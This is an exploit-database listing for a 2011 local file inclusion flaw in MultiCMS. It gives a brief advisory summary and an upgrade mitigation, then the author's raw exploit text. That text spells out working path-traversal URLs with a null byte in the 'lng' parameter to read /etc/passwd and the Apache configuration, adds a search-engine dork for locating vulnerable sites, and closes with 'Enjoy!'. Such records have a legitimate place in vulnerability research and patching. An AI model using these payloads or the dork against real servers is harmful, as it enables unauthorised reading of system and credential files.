header-logo
Suggest Exploit
vendor:
MultiCMS
by:
R3VAN_BASTARD
7.5
CVSS
HIGH
File Inclusion
98
CWE
Product Name: MultiCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2011

MultiCMS File Inclusion Vulnerbility

MultiCMS is vulnerable to a File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious file path in the 'lng' parameter. This will allow the attacker to read arbitrary files on the server.

Mitigation:

Upgrade to the latest version of MultiCMS to patch this vulnerability.
Source

Exploit-DB raw data:

Source: http://packetstormsecurity.org/files/view/97987/multicms-lfi.txt

=============================www[dot]Whiteponny[dot]com=============================
# Date: 29/01/2011
# Author: R3VAN_BASTARD
# Exploit Title: MultiCMS File Inclusion Vulnerbility
# Vendor: http://www.multicms.net
# Status: FIXED
# Tested on: Windows 7
# Dork: "Redakcní systém MultiCMS"
# Mail: defrontliner@whiteponny.com
================================================================================
# File: /Index.php?lng=[LFI]
# XPL: http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/passwd%00
           http://Localhost.com/[path]/index.php?lng=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00 

Enjoy! :D
================================================================================
Thanks To: Madonk "Makasih udah nemenin Scan :D"
                 S3T4N a.k.a Zeth.
                 All My Friends
=============================www[dot]Whiteponny[dot]com=============================